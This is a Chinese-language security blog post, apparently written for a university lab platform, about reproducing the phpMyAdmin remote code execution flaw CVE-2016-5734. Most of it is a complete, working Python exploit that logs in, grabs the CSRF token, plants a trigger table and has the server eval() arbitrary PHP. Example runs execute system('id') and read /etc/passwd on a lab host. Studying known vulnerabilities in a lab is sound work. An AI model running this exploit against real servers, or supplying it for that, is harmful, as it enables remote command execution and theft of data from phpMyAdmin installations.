phpmyadmin 远程代码执行漏洞(CVE-2016-5734).md


> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [www.cnblogs.com](https://www.cnblogs.com/xhds/p/12579289.html)


简介

**环境复现:**https://github.com/vulhub/vulhub

线上平台: 榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin 是一套开源的、基于 Web 的 MySQL 数据库管理工具。


影响版本

phpMyAdmin 4.3.0 – 4.6.2（需要一个有效的 phpMyAdmin 登录账号；此外，下面脚本的注释指出服务端 PHP 版本必须低于 5.4.7，因为 PHP 5.4.7 修复了正则表达式被空字节截断的问题，更高版本的 PHP 上该利用方式无效）


代码审计

待更新....


漏洞利用

漏洞利用脚本（Python，需要 `requests` 库）

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

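__author__ = "@iamsecurity"

# phpMyAdmin 4.x embeds a 32-character CSRF token in every page; import.php and
# tbl_find_replace.php reject requests that do not carry a valid one.
TOKEN_LENGTH = 32

# Hex of the single row written into the trigger table: "0/e" followed by a
# NUL byte (0x30 0x2F 0x65 0x00).  The "find" value sent to
# tbl_find_replace.php (see build_exploit_form) must be the same bytes, since
# the server builds its regex from that value and the NUL is what truncates
# the pattern so that "e" is read as the eval modifier.
TRIGGER_ROW_HEX = "302F6500"


def extract_token(html):
    """Return the CSRF token found in a phpMyAdmin page, or None.

    The first ``token=`` marker in ``html`` is used and the TOKEN_LENGTH
    characters after it are returned.  None is returned when the marker is
    absent (e.g. the login failed and an error page came back) or when the
    text after the marker is too short to be a full token.
    """
    marker = "token="
    pos = html.find(marker)
    if pos < 0:
        return None
    start = pos + len(marker)
    token = html[start:start + TOKEN_LENGTH]
    if len(token) < TOKEN_LENGTH:
        return None
    return token


def extract_between(text, start, end):
    """Return the text between the first ``start`` marker and the next ``end`` marker.

    Returns ``text`` unchanged when ``start`` is missing, and everything after
    ``start`` when ``end`` is missing, so a caller always gets something
    printable instead of a mis-sliced fragment.
    """
    i = text.find(start)
    if i < 0:
        return text
    i += len(start)
    j = text.find(end, i)
    if j < 0:
        return text[i:]
    return text[i:j]


def build_table_sql(table):
    """Return the SQL that creates the one-row trigger table ``table``.

    The table name is placed inside backticks without escaping; the caller is
    expected to reject names that contain a backtick.
    """
    return '''CREATE TABLE `{0}` (
      `first` varchar(10) CHARACTER SET utf8 NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    INSERT INTO `{0}` (`first`) VALUES (UNHEX('{1}'));
    '''.format(table, TRIGGER_ROW_HEX)


def build_exploit_form(db, table, token, payload):
    """Return the form fields for the tbl_find_replace.php request.

    ``payload`` is PHP source that the vulnerable preg_replace() will eval()
    as the replacement expression.
    """
    return {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        # Must be byte-for-byte the row content from TRIGGER_ROW_HEX.
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true",
    }


def parse_json(resp):
    """Return the decoded JSON body of ``resp``, or None if it is not JSON."""
    try:
        return resp.json()
    except ValueError:
        return None


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()

    # Strip a trailing slash so the path concatenations below never yield "//".
    url_to_pma = arguments.url.rstrip("/")
    uname = arguments.user
    upass = arguments.pwd
    db = arguments.dbs if arguments.dbs else "test"
    # With --table the operator points at a table that already holds the
    # trigger row, so the CREATE/INSERT step is skipped.
    custom_table = bool(arguments.table)
    table = arguments.table if custom_table else "prgpwn"
    payload = arguments.cmd if arguments.cmd else "system('uname -a');"

    if "`" in table:
        print("ERROR: table name must not contain a backtick.")
        sys.exit(1)

    s = requests.Session()
    # Proxy hook for Burp/ZAP etc.:
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    #
    # TLS verification is disabled on purpose (lab targets with self-signed
    # certs).  Be aware that the phpMyAdmin credentials are then sent to
    # whatever answers at the URL, so only use this against hosts you control.
    s.verify = False

    # Log in and harvest the CSRF token from the resulting page.
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    token = extract_token(resp.text) if resp.status_code == 200 else None
    if token is None:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if not custom_table:
        # Create the trigger table via import.php.  NOTE: the script never
        # drops this table; clean it up by hand after the engagement.
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": build_table_sql(table),
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data)
        if resp.status_code == 200:
            body = parse_json(resp)
            if isinstance(body, dict) and body.get("success") is False:
                error = extract_between(body.get("error", ""), "<code>", "</code>")
                if "already exists" in error:
                    # Left over from an earlier run: reuse it as-is.
                    print(error)
                else:
                    print("ERROR: " + error)
                    sys.exit(1)

    # Trigger the vulnerable find/replace; the eval()ed payload output comes
    # back inside the JSON "message" field.
    resp = s.post(url_to_pma + "/tbl_find_replace.php", build_exploit_form(db, table, token, payload))
    if resp.status_code != 200:
        print("Exploit request failed with HTTP status %d" % resp.status_code)
        sys.exit(1)

    body = parse_json(resp)
    message = body.get("message", "") if isinstance(body, dict) else ""
    cut = message.find("</a>")
    # Skip "</a>" plus the markup that follows it; the +8 offset is the one the
    # original author calibrated against phpMyAdmin 4.6.x output.  When no
    # anchor is present the whole message is shown rather than a blind slice.
    result = message[cut + 8:] if cut >= 0 else message
    if result:
        print("result: " + result)
        sys.exit(0)
    print(
        "Exploit failed!\n"
        "Try to manually set exploit parameters like --table, --database and --token.\n"
        "Remember that servers with PHP version greater than 5.4.6"
        " is not exploitable, because of warning about null byte in regexp"
    )
    sys.exit(1)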


python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('id')"

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('cat /etc/passwd')"